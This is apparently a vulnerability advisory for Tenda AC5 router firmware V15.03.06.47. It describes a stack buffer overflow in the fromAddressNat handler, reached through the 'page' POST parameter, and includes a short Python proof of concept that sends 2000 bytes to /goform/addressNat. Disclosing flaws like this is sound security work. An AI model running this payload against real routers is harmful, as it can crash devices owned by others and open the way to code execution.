Overview

• The device's official website: https://www.tenda.com.cn/product/overview/AC5.html
• Firmware download website: https://www.tendacn.com/download/detail-3793.html

Affected version

AC5 V1.0 V15.03.06.47

Vulnerability details

The Tenda AC5 V1.0 V15.03.06.47 firmware has a stack overflow vulnerability in the fromAddressNat function. The v3 variable receives the page parameter from a POST request. The value is directly used in a sprintf function and passes to a local variable on the stack, which can override the return address of the function. The user-provided page can trigger this security vulnerability.

POC

import requests
from pwn import*

ip = "192.168.84.101"
url = "http://" + ip + "/goform/addressNat"
payload = b"a"*2000

data = {"page": payload}
response = requests.post(url, data=data)
print(response.text)